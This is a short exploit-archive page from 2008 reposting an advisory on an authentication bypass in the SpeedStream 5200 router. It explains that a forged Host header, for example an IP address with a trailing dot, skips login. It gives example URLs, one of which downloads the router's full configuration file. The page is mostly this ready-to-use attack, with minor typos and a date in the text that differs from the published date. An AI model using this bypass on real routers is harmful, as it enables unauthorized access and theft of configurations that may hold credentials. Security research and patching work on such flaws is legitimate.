SpeedStream 5200 Authentication Bypass Config Download Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SpeedStream 5200 Authentication Bypass Config Download Vulnerability
# Published : 2008-11-07
# Author : hkm
# Previous Title : GE Proficy Real Time Information Portal Credentials Leak Sniffer (meta)
# Next Title : Chilkat Crypt Activex Arbitrary File Creation/Execution PoC

######################################################################################

 SpeedStream 5200 Authentication Bypass - hkm 12/10/2008
 (Server: NetPort Software 1.1)

 It is posible to bypass authentication by modifying the Host header.
 If you use a Host that is not the authentic one it will not require authentication.

 http://189.255.255.255./          -  This would bypass authentication too.
 http://189.255.255.255./x.cfg     -  This downloads the full router conifguration.


 hkm [ @ ] hakim.ws
______________________________________________________________________________________
######################################################################################

# www.Syue.com [2008-11-07]